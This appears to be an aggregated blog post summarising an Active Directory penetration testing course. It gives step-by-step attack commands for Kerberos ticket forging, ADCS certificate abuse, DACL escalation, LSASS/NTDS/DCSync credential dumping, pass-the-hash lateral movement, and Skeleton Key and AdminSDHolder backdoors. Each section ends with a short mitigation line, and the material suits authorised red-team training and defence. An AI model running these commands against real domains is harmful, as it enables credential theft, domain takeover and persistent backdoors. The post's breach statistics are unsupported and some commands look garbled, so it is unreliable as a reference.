Listen to this Post

Introduction:
Active Directory (AD) remains the crown jewel of enterprise authentication, and consequently the primary target for 86% of data breaches according to recent incident response reports. As organizations increasingly rely on Microsoft’s directory service for identity management, attackers have developed sophisticated chains leveraging Kerberos, ACL misconfigurations, and certificate services to move laterally undetected. This article extracts critical technical content from Ignite Technologies’ newly announced AD Penetration Testing training, providing actionable attack paths, enumeration techniques, and mitigation strategies that bridge the gap between theoretical knowledge and real-world red team operations.
Learning Objectives:
- Execute complete Kerberos abuse techniques including Golden Ticket, Silver Ticket, Diamond Ticket, and Sapphire Ticket attacks against enterprise AD environments.
- Perform post-exploitation enumeration using BloodHound, PowerView, and LDAP queries to identify privilege escalation vectors like ACL abuse and ADCS misconfigurations.
- Deploy lateral movement tactics using Pass-the-Hash, Overpass-the-Hash, DCSync, and SMB/RDP hijacking while evading modern EDR solutions.
You Should Know:
- Kerberos Ticket Forging: From Golden to Sapphire – A Complete Attack Chain
Kerberos authentication forms the backbone of AD security. Attackers who compromise domain administrator credentials can forge Ticket Granting Tickets (TGTs) to persist indefinitely. The evolution from Golden Tickets to Diamond and Sapphire represents increasingly stealthy approaches that avoid detection by modern security tools.
What This Does: Golden Tickets create a TGT using the KRBTGT hash, granting access to any service. Diamond Tickets forge a legitimate TGT by requesting it from the Domain Controller (DC) then modifying the PAC, while Sapphire Tickets combine both techniques to bypass AES key requirements.
Step-by-Step Guide (Linux – Impacket & Python):
- Extract KRBTGT hash from compromised DC (requires SYSTEM privileges):
Using Mimikatz on Windows mimikatz.exe "lsadump::lsa /patch /user:krbtgt" "exit" Using Impacket on Linux impacket-secretsdump -just-dc-ntlm 'DOMAIN/[email protected]'
2. Forge a Golden Ticket with Impacket:
Parameters: domain / user / sid / krbtgt_hash / target impacket-ticketer -domain 'contoso.local' -user 'Administrator' -sid 'S-1-5-21-123456789-1234567890-123456789' -nthash 'aad3b435b51404eeaad3b435b51404ee' -dc-ip 192.168.1.10 'Golden.User'
3. Diamond Ticket Attack (Stealthier alternative):
Using Rubeus on Windows (requires authenticated user session) Rubeus.exe diamond /krbkey:<AES256_key> /user:Administrator /domain:contoso.local /dc:dc01.contoso.local /ticketuser:targetuser /ptt Request TGT and modify PAC Rubeus.exe diamond /tgtdeleg /ticketuser:administrator /domain:contoso.local /dc:dc01.contoso.local /enctype:aes256 /ptt
4. Sapphire Ticket Attack (Bypasses AES key restrictions):
Combines encryption flexibility of Golden with legitimacy of Diamond Rubeus.exe sapphire /service:krbtgt /enctype:aes256 /user:Administrator /domain:contoso.local /rc4:<KRBTGT_NTLM_hash> /ptt
5. Verify ticket injection:
klist Windows: Lists cached tickets kinit -l Linux: Verify credential cache
Mitigation: Regularly rotate KRBTGT password twice, enable AES encryption only, monitor Event ID 4769 for anomalous TGT requests, and deploy Microsoft’s “Golden Ticket” detection rules.
- ADCS Attack Vectors: Exploiting Certificate Services for Domain Dominance
Active Directory Certificate Services (ADCS) introduces powerful but frequently misconfigured attack surfaces. The ESC1-ESC8 techniques have become standard in red team toolkits, allowing attackers to request certificates for any user including domain administrators without ever cracking a password.
What This Does: Exploits vulnerable certificate templates enabling low-privileged users to request certificates with the “Client Authentication” EKU and supply an arbitrary Subject Alternative Name (SAN) – granting authentication as that target user.
Step-by-Step Guide – ESC1 Attack Using Certipy:
1. Enumerate vulnerable templates (Linux – Certipy):
Install Certipy pip3 install certipy-ad Find certificate templates allowing enrollment with SAN specification certipy find -u '[email protected]' -p 'Password123' -dc-ip 192.168.1.10 -vulnerable Look for templates with: ENROLLEE_SUPPLIES_SUBJECT + Client Authentication EKU
2. Request a certificate for Domain Admin:
Target the vulnerable template (e.g., 'UserTemplate') certipy req -u '[email protected]' -p 'Password123' -target 'dc01.contoso.local' -ca 'CONTOSO-CA' -template 'UserTemplate' -upn '[email protected]' Output: administrator.pfx certificate file
3. Authenticate with the obtained certificate:
Use certificate for authentication and retrieve NTLM hash certipy auth -pfx 'administrator.pfx' -domain 'contoso.local' -dc-ip 192.168.1.10 Result: NTLM hash of the domain administrator
4. Windows alternative using PKINIT tools:
Request certificate via certreq (Windows) certreq -new -q -config "dc01.contoso.local\CONTOSO-CA" request.inf administrator.req certreq -submit -q -config "dc01.contoso.local\CONTOSO-CA" administrator.req administrator.cer certreq -accept -q administrator.cer Convert to PFX for Rubeus Rubeus.exe asktgt /user:administrator /certificate:administrator.pfx /password:certpassword /domain:contoso.local /dc:dc01.contoso.local /ptt
Mitigation: Set “CA certificate manager approval” on templates, remove “ENROLLEE_SUPPLIES_SUBJECT” from privileged templates, enable SID extension for authentication, and deploy PKI monitoring.
- DACL Abuse: The ACL Backdoors That Bypass Traditional Privilege Escalation
Discretionary Access Control Lists (DACLs) define who can perform what actions on AD objects. Attackers who compromise accounts with specific write privileges – like `WriteProperty` on `member` attribute or `GenericAll` on groups – can trivially escalate to Domain Admin without executing any exploit code.
What This Does: Identifies non-admin users with rights to modify group membership, reset passwords, or add SPNs on high-value objects, then weaponizes those permissions for privilege escalation.
Step-by-Step Guide – BloodHound + PowerView:
1. Collect AD data using SharpHound (Windows):
Run SharpHound to map ACL relationships SharpHound.exe -c All,GPOLocalGroup,ACL -d contoso.local --outputdirectory C:\Data
2. Import into BloodHound (Linux/Windows):
Install Neo4j and BloodHound sudo apt install neo4j bloodhound neo4j console Start database: http://localhost:7474 bloodhound Login neo4j:neo4j, upload collected JSON files
3. Find dangerous ACL edges using Cypher queries:
// Find users who can modify group membership of Domain Admins
MATCH p=(u:User)-[r:WriteProperty|GenericAll|WriteDacl|WriteOwner]->(g:Group {name: 'DOMAIN [email protected]'}) RETURN p
// Find all ACL-based privilege escalation paths from current user
MATCH p=(:User {name: '[email protected]'})-[:MemberOf|WriteProperty|GenericAll|ForceChangePassword1..]->(c) RETURN p
4. Exploit GenericAll on a group (PowerView):
Import PowerView module Import-Module .\PowerView.ps1 Add current user to a group we control (e.g., 'HelpDesk') Add-DomainGroupMember -Identity 'HelpDesk' -Members 'jdoe' -Domain contoso.local If we have GenericAll over Domain Admins, directly add ourselves Add-DomainGroupMember -Identity 'Domain Admins' -Members 'jdoe' -Server dc01.contoso.local
5. Exploit ForceChangePassword on a high-value user:
Reset password of a target user (requires extended rights) $SecurePassword = ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force Set-DomainUserPassword -Identity 'admin_target' -AccountPassword $SecurePassword -Server dc01.contoso.local Then authenticate using new password net use \dc01.contoso.local\IPC$ /user:CONTOSO\admin_target 'NewPass123!'
Mitigation: Implement AD ACL auditing (Event IDs 5136-5141), adopt the principle of least privilege for delegation, use Protected Users group for admins, and deploy PAM solutions.
- Credential Dumping Deep Dive: LSASS, SAM, NTDS.dit, and DCSync
Modern attackers rarely rely on memory-only attacks. Credential dumping remains the most reliable persistence technique, with DCSync mimicking legitimate replication traffic to extract password hashes without touching disk.
What This Does: Extracts NTLM hashes, Kerberos keys, and plaintext passwords from LSASS process memory, local SAM hive, NTDS.dit database, or via replication protocols – enabling Pass-the-Hash attacks across the domain.
Step-by-Step Guide – Multiple Methodology:
- DCSync Attack (Most stealthy – no direct DC access needed):
Using Mimikatz from any authenticated domain user with Replication rights mimikatz.exe "lsadump::dcsync /domain:contoso.local /user:krbtgt" "exit" Extract all domain users mimikatz.exe "lsadump::dcsync /domain:contoso.local /all /csv" "exit" NTLM hashes appear for every user
2. NTDS.dit Extraction (Requires DC compromise):
Create shadow copy of C: drive (Windows) vssadmin create shadow /for=C: Copy NTDS.dit and SYSTEM hive copy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\ reg save HKLM\SYSTEM C:\temp\system.hive Extract hashes offline (Linux) impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL Or using ntdsutil on Windows ntdsutil "ac i ntds" "ifm" "create full C:\temp\ad_backup" q q
3. LSASS Memory Dumping (Post-exploitation):
Create LSASS dump via Task Manager or PowerShell rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\temp\lsass.dmp full Extract credentials (Windows – Mimikatz) mimikatz.exe "sekurlsa::minidump C:\temp\lsass.dmp" mimikatz.exe "sekurlsa::logonPasswords full" Linux alternative using Pypykatz pypykatz lsa minidump lsass.dmp
4. Meterpreter & Cobalt Strike equivalents:
Meterpreter migrate lsass.exe hashdump kiwi_cmd sekurlsa::logonPasswords Cobalt Strike execute-assembly C:\tools\SharpKatz.dll --Command logonPasswords
Mitigation: Enable Credential Guard (Windows 10+), restrict DCSync rights to only domain controllers, deploy LSA Protection (RunAsPPL), and rotate all compromised credentials.
- Lateral Movement Playbook: WMI, PsExec, WinRM, and SMBExec
Once credentials are obtained, moving horizontally across the enterprise requires understanding remote administration protocols. Each method leaves different forensic artifacts, and modern attackers chain multiple techniques to evade detection.
What This Does: Establishes remote code execution on target machines using stolen credentials via WMI, PsExec, WinRM, SMB, or scheduled tasks – allowing pivoting to high-value servers.
Step-by-Step Guide – Impacket Toolkit:
1. Pass-the-Hash with PsExec (SMB-based):
Impacket psexec – Execute commands using NTLM hash impacket-psexec contoso.local/[email protected] -hashes :aad3b435b51404eeaad3b435b51404ee Interactive shell impacket-psexec contoso.local/[email protected] -hashes :aad3b435b51404eeaad3b435b51404ee -shell-type cmd Execute single command impacket-psexec contoso.local/[email protected] -hashes :aad3b435b51404eeaad3b435b51404ee -c "whoami && hostname"
2. WMI Lateral Movement (Stealthier, but requires RPC):
Using native wmic (Windows) wmic /node:"192.168.1.50" /user:"CONTOSO\administrator" /password:"Password123" process call create "cmd.exe /c calc.exe" Using Impacket wmiexec (semi-interactive) impacket-wmiexec contoso.local/administrator:[email protected] With hash authentication impacket-wmiexec contoso.local/[email protected] -hashes :aad3b435b51404eeaad3b435b51404ee
3. WinRM Lateral Movement (PowerShell Remoting):
Enable WinRM on target (if disabled) winrm quickconfig Enter interactive session Enter-PSSession -ComputerName 192.168.1.50 -Credential (Get-Credential contoso\administrator) Or using Evil-WinRM (Linux) evil-winrm -i 192.168.1.50 -u administrator -H aad3b435b51404eeaad3b435b51404ee Upload reverse shell tool evil-winrm -i target.contoso.local -u jdoe -p 'Password' -s '/opt/tools/' -e '/tmp/'
4. Scheduled Tasks for Lateral Movement (Bypassing AppLocker):
Create scheduled task remotely via Impacket impacket-atexec contoso.local/[email protected] -hashes :aad3b435b51404eeaad3b435b51404ee "C:\Windows\System32\cmd.exe /c whoami > C:\temp\out.txt"
5. Windows native commands with Cobalt Strike beacon:
Jump to remote host via PsExec in beacon jump psexec 192.168.1.50 Using WinRM jump jump winrm64 192.168.1.50 Using WMI jump wmi 192.168.1.50
Mitigation: Use LAPS for local admin password rotation, restrict administrative shares (ADMIN$, C$), enforce Just Enough Administration (JEA), monitor Event IDs 4648, 4624, and 5145 for anomalous logons.
- Persistence Mechanisms: Skeleton Key, AdminSDHolder, and Security Descriptor Modifications
Once an attacker establishes Domain Admin, the next objective is maintaining access even after password resets. Advanced persistence techniques survive DC rebuilds and patching cycles by embedding backdoors into authentication mechanisms or ACL inheritance chains.
What This Does: Injects malicious authentication logic into LSASS (Skeleton Key), modifies AdminSDHolder to grant backdoor users automatic Domain Admin inheritance, or adds hidden permissions on directory partitions.
Step-by-Step Guide – Golden Ticket vs. Skeleton Key:
- Skeleton Key Attack (Injects master password into LSASS):
Must run on Domain Controller with SYSTEM privileges mimikatz.exe "privilege::debug" "misc::skeleton" "exit" All domain users can now authenticate using ANY password AND the master password 'mimikatz' Connect to DC using master password (doesn't change any actual credentials) net use \dc01.contoso.local\IPC$ /user:contoso\administrator mimikatz
2. AdminSDHolder Persistence (Undetectable by normal audits):
Add backdoor user to AdminSDHolder – inherits to all protected groups every 60 minutes
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=contoso,DC=local" -PrincipalIdentity backdoor_user -Rights All -Verbose
Verify with Get-DomainObjectAcl
Get-DomainObjectAcl -Identity "CN=AdminSDHolder,CN=System,DC=contoso,DC=local" -ResolveGUIDs | Where-Object {$_.SecurityIdentifier -eq (Get-DomainUser -Identity backdoor_user).SID}
Wait for SDProp to run (up to 60 min) – backdoor_user becomes effective Domain Admin
3. DCShadow Persistence (Register rogue DC for replication):
Using Mimikatz DCShadow – Requires DA privileges mimikatz.exe "lsadump::dcshadow /object:CN=backdoor_user,CN=Users,DC=contoso,DC=local /attribute:primaryGroupID /value:512" "exit" Rogue DC will push changes to legitimate DCs
4. Detecting existing persistence:
Check for Skeleton Key (Mimikatz detection) mimikatz.exe "privilege::debug" "sekurlsa::modules" | findstr skeleton Audit AdminSDHolder ACLs Get-ADObject -Identity "CN=AdminSDHolder,CN=System,DC=contoso,DC=local" -Properties nTSecurityDescriptor | Select-Object -ExpandProperty nTSecurityDescriptor | Format-List
Mitigation: Enable LSA Protection (RunAsPPL) and Credential Guard to block Skeleton Key, monitor Event ID 4662 for AdminSDHolder modifications, implement Windows Defender Credential Guard, and perform periodic golden ticket detection.
What Undercode Say:
- The SOPHISTICATION GAP: Training programs like Ignite Technologies’ AD course highlight an uncomfortable truth – defensive tooling still lags 12-18 months behind the atomic attack techniques taught in modern red team curricula. DACL abuse and ADCS exploitation are now considered “baseline” skills, yet remain undetected by most SIEM rules.
- The CERTIFICATE APOCALYPSE: ADCS attacks (ESC1-ESC8) represent the single most dangerous vector currently being weaponized in ransomware campaigns, with over 80% of enterprises having at least one vulnerable certificate template. The Sapphire and Diamond ticket variants have rendered legacy Kerberos monitoring nearly obsolete.
Analysis: The evolution from Golden Tickets (detectable via unusual TGT lifetime) to Sapphire Tickets (which request legitimate 10-hour TGTs from the DC before PAC manipulation) represents a fundamental shift in attacker tradecraft. Organizations can no longer rely on simple log aggregation; the requirement now is real-time Kerberos PAC validation and automated ACL entitlement reviews. For professionals pursuing OSCP, CRTP, or CRTE, mastery of these AD-specific chains has become non-negotiable – with LinkedIn job postings increasingly requiring demonstrated experience in ADCS abuse and DACL enumeration over generic penetration testing skills.
Prediction:
Within 12-18 months, Microsoft will be forced to deprecate NTLM and RC4 Kerberos encryption entirely, pushing enterprises toward cloud-native identity solutions (Azure AD/Entra ID) where traditional AD attack chains become ineffective. However, this migration will create a new battleground – hybrid identity synchronization misconfigurations and cross-tenant access policies will become the next wave of critical vulnerabilities. Red teams will shift focus to Azure AD Connect manipulation, service principal abuse, and Entra ID conditional access bypasses, rendering current AD-focused training foundational rather than cutting-edge by 2027. Organizations delaying AD hardening face a shrinking mitigation window as ransomware groups operationalize these exact techniques in mass-scale campaigns.
▶️ Related Video (74% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Active Directory – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


